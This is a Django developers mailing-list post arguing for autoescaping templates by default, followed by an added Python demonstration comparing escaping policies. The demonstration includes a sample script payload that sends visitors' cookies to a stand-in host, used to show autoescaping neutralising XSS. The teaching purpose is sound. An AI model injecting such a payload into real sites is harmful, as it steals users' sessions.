On 8/22/06, Ahmad Alhashemi <[EMAIL PROTECTED]> wrote:
> But if you keep poking holes in all the wrong places, then it is not
> the framework's fault.
>
> Autoescaping might be a nice DRY feature, but I don't think it has
> anything to do with being secure by default.

Usable security is about making it easier to do the things that make
or keep you secure and making it less easy to do things that are
dangerous or insecure.

Everybody using dj templates is putting context into them all the
time; most of the time it's fine.  You're trained into doing something
by rote and sometimes it's wrong.

Interaction with applications (even text editors and codelibs) wears
grooves in the judgement of people.  Escape by default is the Right
way.  I'd much rather see a double-escaped whoopsie than have my
cookies stolen.

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups 
"Django developers" group.
To post to this group, send email to django-developers@googlegroups.com
To unsubscribe from this group, send email to [EMAIL PROTECTED]
For more options, visit this group at 
http://groups.google.com/group/django-developers
-~----------~----~----~----~------~----~------~--~---
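An added example, not code from the original thread and not Django's own template engine: a toy placeholder renderer that implements the two policies argued over in the message above (escape only where the author remembers, versus escape everything unless the author opts out), run against a constructed cookie-stealing comment. The names `render_escape_on_demand`, `render_autoescape`, `SafeString`/`mark_safe`, the `{name}` placeholder syntax and the sample payload are all assumptions of this example.

```python
import html
import re

# Constructed sample input: a comment body submitted by a hostile user. If it
# reaches the browser as markup, the visitor's session cookie leaves with it.
COOKIE_STEALER = (
    "<script>new Image().src='https://evil.example/?c='+document.cookie</script>"
)

# Template with one placeholder; {name} is the toy syntax of this example only.
COMMENT_TEMPLATE = '<p class="comment">{body}</p>'
_PLACEHOLDER = re.compile(r"\{(\w+)\}")


class SafeString(str):
    """Marker for HTML the template author has vouched for (already escaped,
    or trusted markup). Hypothetical stand-in for a mark_safe() result."""


def mark_safe(value):
    """Opt a value out of autoescaping; the author takes responsibility."""
    return SafeString(value)


def render_escape_on_demand(template, context):
    """Policy 1: values go in raw. The author must remember html.escape() on
    every untrusted value; each forgotten call is an XSS hole."""
    return _PLACEHOLDER.sub(lambda m: str(context[m.group(1)]), template)


def render_autoescape(template, context):
    """Policy 2: every value is escaped unless it is a SafeString. A value the
    author escaped by hand is escaped twice, which mangles display but cannot
    execute."""
    def substitute(match):
        value = context[match.group(1)]
        if isinstance(value, SafeString):
            return str(value)
        return html.escape(str(value), quote=True)
    return _PLACEHOLDER.sub(substitute, template)


def executes_as_markup(rendered):
    """Crude oracle: did a <script> tag survive into the output as a tag?"""
    return "<script" in rendered.lower()


def compare_policies(payload=COOKIE_STEALER):
    """Render the same hostile input under both policies, with the author
    remembering and forgetting to escape, and return every output."""
    forgot = {"body": payload}
    remembered = {"body": html.escape(payload, quote=True)}
    return {
        # Policy 1, author forgot: live XSS (the "cookies stolen" case).
        "on_demand_forgot": render_escape_on_demand(COMMENT_TEMPLATE, forgot),
        # Policy 1, author remembered: safe, but only through discipline.
        "on_demand_remembered": render_escape_on_demand(COMMENT_TEMPLATE, remembered),
        # Policy 2, author forgot: still safe, the engine escaped for them.
        "autoescape_forgot": render_autoescape(COMMENT_TEMPLATE, forgot),
        # Policy 2, author also escaped by hand: the double-escaped whoopsie.
        "autoescape_remembered": render_autoescape(COMMENT_TEMPLATE, remembered),
        # Policy 2, trusted markup explicitly marked safe: passes through.
        "autoescape_marked_safe": render_autoescape(
            COMMENT_TEMPLATE, {"body": mark_safe("<b>trusted</b>")}),
    }


if __name__ == "__main__":
    for name, out in compare_policies().items():
        status = "LIVE XSS" if executes_as_markup(out) else "inert"
        print(f"{name:24s} {status:9s} {out}")
```

The asymmetry is the whole argument: under policy 1 the only failure mode is a live script in the page, while under policy 2 the only failure mode is a visible `&amp;lt;` in the output, which a user notices and a developer fixes without anyone losing a session. The `quote=True` matters too, since the same value may later be dropped into an attribute.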